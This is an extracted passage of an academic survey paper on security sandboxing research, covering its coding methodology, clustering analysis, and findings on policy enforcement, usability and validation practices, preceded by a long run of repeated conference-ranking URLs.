https://personal.cis.strath.ac.uk/changyu.dong/ranking.html http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/ConfRanking.html http://dx.doi.org/10.7717/peerj-cs.43 Table 3 Our research questions, the areas each question attempts to illuminate, and potential answers. The answers are codes in the content analysis process we apply. Answers are not necessarily mutually exclusive. Definitions for the terms in this table appear in our coding frames (see Supplemental Information 1) with examples. Question area Question Possible answers Where in the architecture are policies enforced? Component, application, host Sandbox lifecycle How and when are policies imposed? Statically, dynamically, hybrid What resources do the sandboxes protect? Memory, code/instructions, files, user data, communications Which components do the sandboxes protect? Component, application, application classSecurity outcomes At what point will sandboxes catch exploits? Pre-exploit, post-exploit What must be done to apply the sandboxes? Nothing, select pre-made policy, write policy, run tool, install tool Effort and applicability What are the requirements on sandboxed components? None, source code, annotated source code, special compiler, compiler-introduced metadata, sandbox framework/library components Who defines policies? Sandbox developer (fixed), sandbox user (user-defined), application developer (application-defined) How are policies managed? Central policy repository, no managementPolicy provenance and manifestation How are policies constructed? Encoded in sandbox logic, encoded in application logic, user written What claims are made about sandboxes? Performance, security, applicability How are claims validated? Proof, analytical analysis, benchmark suite, case studies, argumentation, using public dataResearch claims and validation How are sandboxes released for review? Source code, binaries, not available • Techniques are applied using some form of automation (e.g., not through entirely manual re-architecting) • A policy is imposed on an identifiable category of applications or application subsets - The policy is imposed locally on an application (e.g., not on the principal the application executes as, not on network packets in-transit, etc.) - The category encompasses a reasonable number of real-world applications (e.g., doesn’t require the use of (1) a research programming language, (2) extensive annotations, or (3) non-standard hardware) We gathered papers by reading each title in the conference proceedings for a given year. We included a paper in our initial dataset if the title gave any indication that the paper could meet the criteria. We refined the criteria by reviewing papers in the initial dataset from Oakland before inspecting the proceedings from other venues. We read the remaining papers’ abstracts, introductions, and conclusions and excluded papers as they were being interpreted if they did not meet the criteria. We maintained notes about why individual papers were excluded from the final set.4 4 Our full list of papers with exclusion notes is available in Supplemental Information 2. Categorizing the dataset To interpret papers we developed coding frames5 where a category is a research question 5 Our full coding frames are available in Supplemental Information 1. and a code is a possible answer to the question. To ensure consistency in coding, our frames Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 9/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43/supp-1 http://dx.doi.org/10.7717/peerj-cs.43/supp-1 http://dx.doi.org/10.7717/peerj-cs.43/supp-1 http://dx.doi.org/10.7717/peerj-cs.43/supp-2 http://dx.doi.org/10.7717/peerj-cs.43/supp-2 http://dx.doi.org/10.7717/peerj-cs.43/supp-2 http://dx.doi.org/10.7717/peerj-cs.43/supp-1 http://dx.doi.org/10.7717/peerj-cs.43/supp-1 http://dx.doi.org/10.7717/peerj-cs.43/supp-1 http://dx.doi.org/10.7717/peerj-cs.43 include detailed definitions and examples for each category and code. Our codes are not mutually exclusive: a question may have multiple answers. We developed the majority of our frames before performing a detailed analysis of the data, but with consideration for what we learned about sandboxing papers while testing the inclusion criteria above on our data from Oakland. We learned that evaluative questions were quite interesting while cod- ing papers, thus frames concerning what claims were made about a sandbox and how those claims were validated became more fine-grained as the process progressed. Whenever we modified a frame, we updated the interpretations of all previously coded papers. We tested the frames by having two coders interpret different subsets of the Oakland segment of the initial dataset. To interpret a paper, each category was assigned the appropriate code(s) and a quote justifying each code selection was highlighted and tagged in the paper’s PDF.6 While testing, the coders swapped quotes sans codes and 6 A full list of quotes with code assign- ments is available in Supplemental Information 3. independently re-assigned codes to ensure consistency, but we did not measure inter-rater reliability. Code definitions were revised where they were ambiguous. While there is still some risk that different coders would select different quotes or assign codes to the same quote, we believe our methodology sufficiently mitigated the risk without substantially burdening the process given the large scope of this effort. After coding every paper, we organized the codes for each paper by category in a unified machine-readable file7 (hereafter referred to as the summary of coded papers) for further 7 The summarized version of our dataset is available as Supplemental Information 4. This spreadsheet was converted to a CSV file to perform statistical and graph-based analyses. processing. Analyzing the dataset To summarize the differences and similarities between sandboxing papers, we attempted to identify clusters of similar sandboxing techniques. To do so, we first calculated a dissimilarity matrix for the sandboxes. For category k, let pijk be the number of codes that sandboxes i and j share, divided by the total number of codes in that category they could share. For categories in which each sandbox is interpreted with one and only one code, pijk is either 1 or 0; for other categories, it falls in the interval [0,1]. Then the dissimilarity between i and j is dij =  k(1 − pijk). We fed the resulting dissimilarity matrix into a hierarchical agglomerative clustering algorithm (Kaufman & Rousseeuw, 2009) (implemented in R with the cluster package (R Core Team, 2014; Maechler et al., 2014)). This algorithm begins by treating each sandbox as its own cluster, and then iteratively merges the clusters that are nearest to each other, where distance between two clusters is defined as the average dissimilarity between the clusters’ members. The agglomerative clustering process is displayed in dendrograms. We stopped the agglomerative process at the point at which there were two clusters remaining, producing two lists of sandboxes, one list for each cluster. To interpret the resulting clusters, we produced bar charts displaying the code membership by cluster. We conducted this analysis three times: once using all of the categories to define dissimilarity, once using all categories except those for claims, validation, and availability, and once using the validation categories. We do not present the plots from the analysis that ignored claims, validation, and availability because it did not produce results different from those generated using all categories. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 10/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43/supp-3 http://dx.doi.org/10.7717/peerj-cs.43/supp-3 http://dx.doi.org/10.7717/peerj-cs.43/supp-3 http://dx.doi.org/10.7717/peerj-cs.43/supp-4 http://dx.doi.org/10.7717/peerj-cs.43/supp-4 http://dx.doi.org/10.7717/peerj-cs.43/supp-4 http://dx.doi.org/10.7717/peerj-cs.43 We conducted correlational analyses to learn whether sandbox validation techniques have improved or worsened over time, or whether sandbox publications with better (or worse) validation received more citations. The validation codes were ordered in the following way: proof > analytical analysis > benchmarks > case study > argumentation > none. This ordering favors validation techniques that are less subjective. While it is possible for a highly ranked technique to be applied less effectively than a lower ranked technique (e.g., a proof that relies on unrealistic assumptions relative to a thorough case study) this ranking was devised after coding the papers and is motivated by the real world applications of each technique in our dataset. Each claim type (security, performance, and applicability), then, was an ordinal random variable, so rank-based methods were appropriate. When a sandbox paper belonged to two codes in a particular validation category, we used its highest-ordered code to define its rank, and lower-ordered codes to break ties. So, for instance, if paper A and paper B both included proofs, and paper A also included benchmarks, paper A would be ranked higher than paper B. To test if a claim type was improving over time, we estimated the Spearman correlation (Spearman, 1904) between its codes and the year of publication, and hence tested for a monotonic trend. Testing if papers with better validation, in a particular category, received more citations necessitated accounting for year of publication, since earlier papers typically have higher citation counts. To do so, we regressed paper citation rank against both publication year and category rank. (We used the rank of papers’ citation counts as the dependent variable, as opposed to the citation counts themselves, due to the presence of an influential outlier—Terra (Garfinkel et al., 2003). Scatterplots show the relationship between citation ranks and publication year to be approximately linear, so a linear adjustment should suffice.) There was a “validation effect” if the coefficient on the validation measure was significantly different from zero. We conducted four separate regression analyses: one in which citation ranks were regressed on publication year and category ranks of all three validation criteria, and one in which citation ranks were regressed on publication year and security validation only, one in which citation ranks were regressed on publication year and performance validation only, and one in which citation ranks were regressed on publication year and applicability validation only. We constructed a citation graph using the papers in our set as nodes and citations as edges as a final means of better understanding the sandboxing landscape. We clustered the nodes in this graph using the same clusters found statistically, using the process describe above, and using common topics of interest we observed. The topics of interest are typically based on the techniques the sandboxes apply (e.g., Control Flow Integrity (CFI), artificial diversity, etc.). We evaluate these clusters using the modularity metric, which enables us to compare the quality of the different categorizations. Modularity is the fraction of edges that lie within a partition, above the number that would be expected if edges were distributed randomly. RESULTS We derived our results from the various statistical clusters of our summary of coded papers, trends explicit in this dataset, and observations made while reading the papers Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 11/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 or analyzing our summarized data. As our dataset is public, we encourage readers to explore the data themselves. Note while interpreting the statistical clusters that they are not representative of how papers are related in terms of broad topics of interest. When we applied the statistical clusters to the citation graph of the papers in our set the modularity scores were −0.04 and 0.02 when papers were clustered based on all of the attributes we coded and just validation attributes respectively. These modularity scores mean that the statistical clusters are no better than randomly clustering papers when considering how they cite each other. These poor modularity scores make sense because authors are much more likely to cite papers that use similar techniques or tackle similar problems than use similar validation strategies. We confirmed the latter observation by computing that the modularity for overlapping groups (Lázár, Ábel & Vicsek, 2009) based on validation is −0.198, which confirms that partitions built from the validation techniques do not direct citation graph structure. Indeed, when we clustered papers in the citation graph based on topics of inter- est we observed while interpreting the set, the modularity score, 0.33, is significantly better than a random cluster. The citation graph with topic clusters is shown in Fig. 2. While these clusters are potentially of sociotechnical interest to the community, we must look at lower-level attributes to understand how sandboxes are to be applied in practice and how they improve the security posture of real systems. The statistical clusters fill that role. Figures 3 and 4 show the codes that are members of the fixed policy and user-defined policy clusters respectively when all categories are considered. The dendrogram for these clusters appears in Fig. 5. Many of our results are interpretations of these charts. Table 4 succinctly describes our results per research question and references later sections where more details are found. The remainder of this section presents those details. Sandboxes: building materials for secure systems Sandboxes are flexible security layers ready to improve the security posture of nearly any type of application. While the deployment requirements and details vary from sandbox to sandbox, collectively they can be applied at many different points in a system’s architecture and may be introduced at any phase in an application’s development lifecycle, starting with the initial implementation. In fact, sandboxes can even be applied well after an application has been abandoned by its maintainer to secure legacy systems. In our dataset, the policy enforcement mechanism for a sandbox is always deployed as a system component, as a component of an application host, or by insertion directly into the component that is being encapsulated. While application hosts are becoming more popular as many applications are moved into web browsers and mobile environments, they are currently the least popular place to deploy policy enforcement mechanisms for research sandboxes. Our set includes ten sandboxes where policies are enforced in the application host, twenty-six in the component being encapsulated,8 and thirty-two in a 8 Sehr et al. (2010) is counted twice because the enforcement mechanism is spread across the application and its host. system component. We believe that application hosts are less represented because many existing hosts come with a sandbox (e.g., the Java sandbox, Android’s application sandbox, NaCl in Google Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 12/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Table 4 Summary of our research questions and results. Research question Results Section Where in a system’s architecture are policies enforced? There is an emphasis on enforcing policies in the operating system or transforming applications to enforce a policy over using application hosts (e.g., language-hosting virtual machines, browsers, etc.). ‘Sandboxes: building materials for secure systems’ When are policies imposed? Static, dynamic, and hybrid strategies are roughly equally favored in all domains but with a slight preference for strictly static or dynamic approaches. ‘Sandboxes: building materials for secure systems’ What application resources are protected by sandboxes? Sandboxes with fixed policies tend to prevent memory corrup- tion or protect properties of application code (e.g., control flow). User-defined policies are correlated with policies that are more diverse and cover the gamut of application-managed resources. ‘Sandboxes: building materials for secure systems’ What types of components are protected by sandboxes? Sandboxes that use fixed policies tend to require the user to target specific components, while those with user-defined policies tend to allow for broader targeting. ‘Sandboxes: building materials for secure systems’ At what point in the process of an attack will an exploit violate sandbox policies? Sandboxes are primarily pro-active by disrupting exploits before a payload can be executed. Where users must define a policy, sandboxes tend to be pro-active in attempting to stop exploits, but also limit the range of possible behaviors a payload can exhibit. ‘Sandboxes: building materials for secure systems’ What are the requirements of people applying sandboxes? Sandboxes that have fewer requirements for peo- ple tend to have more requirements for the appli- cation. Similarly, having a fixed policy is correlated with more requirements of the application, while user-defined policies are correlated with more requirements of the user. ‘Policy flexibility as a usability bellwether’ What are the requirements of compo- nents being sandboxed? Sandboxes with fixed policies most-often require that applications be compiled using a special compiler. ‘Policy flexibility as a usability bellwether’ Who defines sandbox policies? Policies are most often defined by the sandbox developer at design time. ‘Policy flexibility as a usability bellwether’ How are policies managed? Policy management is largely ignored, even where users must write their own policies. ‘Policy flexibility as a usability bellwether’ How are policies constructed? Most policies are hardcoded in the sandbox. ‘Policy flexibility as a usability bellwether’ What claims are made about sandboxes? Applicability to new cases is often the impetus for im- proving existing techniques, but strong security and better performance are more often claimed. ‘The state of practice in sandbox validation’ How are claims validated? Benchmarks and case studies are the most favored validation techniques for all types of claims. Where security claims are not validated using both benchmarks and case studies, ad-hoc arguments are heavily favored. ‘The state of practice in sandbox validation’ In what forms are sandboxes made available for review? There is a recent slight increase in the release of sandbox source code, but generally no implementation artifacts are made available for review. ‘The state of practice in sandbox validation’ Chrome, etc.). Indeed, all but one of the sandboxes deployed in application hosts are for the web, where applications can gain substantial benefits from further encapsulation and there is currently no de facto sandbox. The one exception is Robusta (Siefers, Tan & Morrisett, 2010), which enhances the Java sandbox to encapsulate additional non-web computations. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 13/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Figure 2 The citation graph for the papers in our set. The colors represent clusters based on topics of interest (modularity = 0.33). Papers cluster based on topics of interest, not necessarily their technical attributes or validation stratgies, thus we must look at lower level attributes to gain a broad understanding of the sandboxing landscape. Papers that were not linked to any of the other papers in the set are not shown. Categories bridging Mandatory Integrity and Access Control (MI/AC) were collapsed to simply Mandatory Access Control (MAC) for this graph. Our citation data can be found in Supplemental Information 5. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 14/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43/supp-5 http://dx.doi.org/10.7717/peerj-cs.43/supp-5 http://dx.doi.org/10.7717/peerj-cs.43/supp-5 http://dx.doi.org/10.7717/peerj-cs.43 Figure 3 Breakdown of the representation of all codes for papers that emphasize fixed policies. Cases where a claim was made but not validated are labeled with an “x”. System components are heavily represented because any sandbox that is to encapsulate a kernel, driver, or other system component must necessarily enforce the policy in a system component. Fifteen of the sandboxes fall into this category because they are encapsulating either a kernel or hypervisor. The remainder could potentially enforce their policies from a less privileged position, but take advantage of the full access to data and transparency to user-mode applications available to system components. This power is useful when enforcing information flow across applications, when preventing memory corruption, or when otherwise enforcing the same policy on every user-mode application. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 15/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Figure 4 Breakdown of the representation of all codes for papers that emphasize user-defined policies. Some sandboxes support a fixed-policy with an optional user-defined policy (e.g., Siefers, Tan & Morrisett, 2010). Cases where a claim was made but not validated are labeled with an “x”. Research sandboxes almost universally embed their enforcement mechanism in the application that is being encapsulated when the application runs in user-mode. Application deployment is correlated with fixed policies where modifying the application itself can lead to higher performance and where it makes sense to ensure the enforcement mechanisms exist anywhere the application is, even if the application moves to a different environment. Fixed-policies with embedded enforcement mechanisms are correlated with another important deployment concern: statically imposed policies. Imposing a policy statically, most often using a special compiler or program re-writer, is advantageous because the policy and its enforcement mechanism can travel with the ap- Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 16/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Figure 5 A dendrogram displaying the clusters for sandboxing papers taking into account all categories. At the topmost level, where two clusters exist, the clusters respectively represent sandboxes that use fixed policies and those that use user-defined policies. plication and overhead can be lower as enforcement is tailored to the targeted code. There are some cons to this approach. For example, the process of imposing the policy cannot be dependent on information that is only available at run-time and the policy is relatively unadaptable after it is set. Furthermore, because the policies are less adaptable, sandboxes that statically impose security policies typically only encapsulate components that are targeted by the person applying the sandbox. These are cases where dynamic mechanisms shine. Given these trade-offs, it makes sense that papers in our set fall into one of two clus- ters when all codes are considered: those that are protecting memory and software code, which are relatively easy to encapsulate with a fixed policy, and those managing behaviors manifested in external application communications or interactions with user-data and files that are more easily encapsulated with an adaptable (typically user-defined) policy. Generally hybrid deployments are used when the approach is necessarily dynamic but static pre-processing lowers overhead. Sometimes, techniques begin as hybrid approaches and evolve to fully dynamic approaches as they gain traction. For example, early papers that introduce diversity in binaries to make reliable exploits harder to write (e.g., code randomization), tend to rely on compiler-introduced metadata, while later papers did not need the extra help. This evolution broadens the applicability of the sandboxing technique. We observed other techniques such as SFI and CFI evolve by reducing the number of requirements on the application, the person applying the sandbox, or both. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 17/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Policy flexibility as a usability bellwether Requiring more work out of the user or more specific attributes of an application lowers the odds that a sandbox will be applied, thus it is natural that research on specific techniques reduce these burdens over time. We find that the nature of the policy has an influence on how burdensome a sandbox is. About half of sandboxes with fixed policies require the application be compiled using a special compiler or uses a sandbox-specific framework or library. Many fixed-policy sandboxes also require the user to run a tool, often a program re-writer, or to install some sandbox component. In comparison, nearly all sandboxes with flexible policies require the user to write a policy manually, but few have additional requirements for the application. Given the burdens involved in manually writing a security policy, the message is clear—easy to use sandboxes reduce the user-facing flexibility of the policies they impose. Forty-eight sandboxes, more than two-thirds of our sample, use a fixed policy. In all of these cases the policy itself exists within the logic of the sandbox. In the remaining cases, the policy is encoded in the logic of the application twice (e.g., through the use of the sandbox as a framework), and the remaining seventeen cases require the user to manually write a policy. In cases where the user must manually write the policy, it would help the user if the sandbox supported a mechanism for managing policies—to ensure policies do not have to be duplicated repeatedly for the same application, to generate starter policies for specific cases, to ensure policies can apply to multiple applications, etc. This type of management reduces the burden of having to manually write policies in potentially complex custom policy languages. Support for the policy writer is also important because the policies them- selves can be a source of vulnerabilities (Rosenberg, 2012). Eight out of twenty-six cases where policy management is appropriate offered some central mechanism for storing ex- isting policies, where they could potentially be shared among users. However, none of the papers in our sample list policy management as a contribution, nor do any of the papers at- tempt to validate any management constructs that are present. However, it is possible that there are papers outside of our target conferences that explicitly discuss management. For example, programming languages and software engineering conferences are more focused on policy authoring concerns and management may therefore be the focus of a paper that appears in one of those conferences. However, in spite of the fact that two of the authors of this paper are active researchers in the Programming Language community and three are active in the Software Engineering community, we are not aware of any such paper. The state of practice in sandbox validation There is little variation in the claims that are made about sandboxes. Most claim to either encapsulate a set of threats or to increase the difficulty of writing successful exploits for code-level vulnerabilities. All but four measure the performance overhead introduced by the sandbox. Thirty-seven papers, more than half, make claims about the types of components the sandbox applies to, typically because the paper applies an existing technique to a different domain or extends it to additional components. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 18/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 While there is wide variety in how these claims are validated, we observe measurable patterns. In our data set, proof and analytical analysis were, by far, the least used techniques. The lack of analytical analysis is due to the fact that the technique is primarily useful when the security of the mechanism depends on randomness, which is true of few sandboxes in our set. However, proof appears in two cases: (1) to prove properties of data flows and (2) six papers prove the correctness of a mechanism enforcing a fixed policy. The rarity of proof in the sandboxing domain is not surprising given the difficulty involved. Proof is particularly difficult in cases where one would ideally prove that a policy enforcement mechanism is capable of enforcing all possible policies a user can define, which we did not see attempted. Instead, claims are often validated empirically or in ways that are ad hoc and qualitative. In empirical evaluations, case studies are the most common technique for all claims, often because proof was not attempted and there is no existing benchmark suite that highlights the novel aspects of the sandbox. For example, papers for sandboxes with fixed policies often want to show a particular class of vulnerabilities can no longer be exploited in sandboxed code, thus examples of vulnerable applications and exploits for their vulnerabilities must be gathered or, very rarely, synthesized. When claims were empirically validated, the results were not comparable in fifteen out of sixty-two cases for performance, twenty-two out of forty-two cases for security, and twenty-four out of thirty-one cases for applicability because non-public data was used in the discussed experiments. Non-public data takes the form of unlabeled exploits, undisclosed changes to public applications, and unreleased custom example cases (e.g., applications built using a sandbox’s framework where the examples were not released). Security claims are notoriously difficult to formalize, hence the pervasive lack of proof. Many papers instead vet their security claims using multi-faceted strategies, often including both common empirical approaches: case studies and experiments using benchmark suites. However, Figs. 6 and 7 illustrate an interesting finding: in twenty-nine papers where multi-faceted strategies are not used, authors pick one empirical tactic and argue that their claims are true. Argumentation in this space is problematic because all of the arguments are ad hoc, which makes evaluations that should be comparable difficult to compare at best but more often incomparable. Furthermore, we observed many cases where arguments essentially summarize as, “Our sandbox is secure because the design is secure,” with details of the design occupying most of the paper in entirely qualitative form. Not only are these types of arguments difficult to compare in cases where sandboxes are otherwise quite similar, it is even harder to see if they are complete in the sense that every sub-claim is adequately addressed. Our correlational analyses show no significant trends in security or applicability analyses, however performance validation has improved over time. Table 5 summarizes the Spearman correlations and their p-values per validation category. Spearman correlations fall in the range [−1, 1], where a value of 0 is interpreted as no correlation, positive values show a positive correlation, and negative values a negative correlation. The magnitude of the coefficient grows towards 1 as time and the validation rank become closer to perfect Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 19/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Figure 6 A dendrogram displaying the clusters for sandboxing papers taking into account validation categories. At the topmost level, where two clusters exist, the clusters respectively represent sandboxes that emphasize multi-faceted empirical security validation and those that do not. monotonic functions (i.e., when a positive and perfect monotonic relationship exists, the Spearman correlation is 1). Performance validation is positively, and statistically significantly, correlated with the passage of time. We observe that performance validation has advanced from a heavy reliance on benchmark suites to the use multi-faceted strategies that include the use of benchmark suites and case studies (typically to perform micro-benchmarks) that make use of public data—which ensures the results are comparable with future sandboxes. While the applicability validation correlation is not statistically significant, we observe that argumentation was abandoned early on in favor of case studies, with some emphasis on including benchmark suites in later years. There is no apparent change in security validation over time. We fit linear models to each validation category separately and together relative to ranked citation counts to see if validation practices are predictive of future citations. All of the models achieved an R-squared value of 0.54 which suggests that passage of time and validation practices jointly explain about half of the variance in citation count ranks. Validation practices on their own are not predictive of how highly cited a paper will Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 20/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Figure 7 Breakdown of the representation of validation codes per claim type for the three validation clusters found in our dataset. Each row contains the data for one cluster. The bottom two clusters include papers that do not emphasize multi-faceted security validation strategies, instead relying on case studies and arguments that security claims are true. Cases where a claim was made but not validated are labeled with an “x”. become. Table 6 summarizes the types of claims and the validation strategies employed per type for each paper in our set. STRENGTHENING SANDBOXING RESULTS The existing body of knowledge within the sandboxing community provides a strong basis for securing current and future software systems. However, the results in ‘Results’ highlight Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 21/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Table 5 The Spearman correlations and their 